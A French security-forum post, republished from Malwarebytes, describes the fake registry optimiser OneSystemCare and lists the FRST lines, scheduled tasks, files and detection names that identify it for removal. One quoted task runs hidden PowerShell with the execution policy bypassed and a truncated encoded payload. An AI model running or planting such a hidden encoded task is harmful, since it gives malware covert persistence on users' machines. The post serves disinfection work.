Auteur Sujet: OneSystemCare  (Lu 1007 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne chantal11

  • Admin Formation
  • Mega Power Members
  • ****
  • Messages: 22970
    • Windows 10 - Windows 8 - Windows 7 - Windows Vista
OneSystemCare
« le: février 14, 2017, 12:00:27 »
Contenu republié avec la permission de Malwarebytes

OneSystemCare est un faux nettoyeur/optimiseur de registre, affiche intentionnellement des faux-positifs pour convaincre l'utilisateur que son système a des problèmes et lui faire acheter le logiciel.
Plus d'infos : Registry Cleaners: Digital Snake Oil | Malwarebytes Labs


  • S'installe en tant que programme, à l'insu de l'utilisateur ou parce qu'il n'a pas décoché les sponsors proposés lors de l'installation d'un logiciel gratuit légitime

  • Affiche ces alertes pendant l'installation

  • Affiche ces fenêtres pendant l'opération



  • Crée cette icône dans la Barre des tâches et sur le Bureau

  • Crée ces tâches planifiées






**********

Détection de OneSystemCare dans des rapports FRST :

Citer
One System Care (HKLM-x32\...\OneSystemCare) (Version: 4.4.0.3 - OneSystemCare) <==== ATTENTION
Task: {11FD0FCC-787D-4FF1-B466-D5659CEA6633} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2016-12-26] () <==== ATTENTION
Task: {4D89F1C3-36A8-4429-8FC1-0B263DA7E332} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2016-12-26] () <==== ATTENTION
Task: {668D20B7-A868-4B90-AF03-489B802C5E0A} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2016-12-26] () <==== ATTENTION
Task: {6CAB0476-77E0-4D8A-9D0A-D4FC8118D982} - System32\Tasks\{057E7947-780B-0E0B-7D11-0E0D0B0C110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAIAA7ADsAOwA7ADsAIAAgACAAIAA7ACAAIAA7ADsAIAAgACAAIAA7ACAAIAA7ACAAIAAgADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA (the data entry has 10184 more characters).
Task: {F04F6E92-DB17-4ED4-8BB7-2F698ABDAD9E} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2016-12-26] () <==== ATTENTION
Task: C:\Windows\Tasks\One System CarePeriod.job => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION

() C:\Program Files (x86)\OneSystemCare\SystemConsole.exe
() C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe
C:\Windows\System32\Tasks\{057E7947-780B-0E0B-7D11-0E0D0B0C110F}
C:\Windows\System32\Tasks\One System Care Task
C:\Windows\System32\Tasks\One System Care Run Delay
C:\Windows\System32\Tasks\One System Care Monitor
C:\Windows\System32\Tasks\One System CarePeriod
C:\Windows\Tasks\One System CarePeriod.job
C:\ProgramData\2a2276f9-20a1-1
C:\ProgramData\2a2276f9-0b93-0
C:\Users\{Nom_Uilisateur}\AppData\Roaming\One System Care
C:\Program Files (x86)\OneSystemCare
C:\Users\Public\Desktop\Launch One System Care.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care

**********

Détecté et traité par Malwarebytes en tant que PUP/LPI (Programme potentiellement Indésirable) et Adware
Sous la version Premium, Malwarebytes bloque le domaine vd.onesystemhost.net et l'IP 104.24.118.133
 

Citer
Adware.OptimizerEliteMax
PUP.Optional.OneSystemCare
PUP.Optional.DNSUnlocker.ACMB2


Tutoriel d'utilisation Malwarebytes en images


Source : Removal instructions for OneSystemCare de Metallica - Malwarebytes Forums



Toujours infecté ? Une question avant de faire des manipulations ?

Venez poster un nouveau sujet dans ce forum : http://forum.security-x.fr/desinfections/  en prenant soin de suivre la procédure http://forum.security-x.fr/desinfections/procedure-preliminaire/
 

Security-X

OneSystemCare
« le: février 14, 2017, 12:00:27 »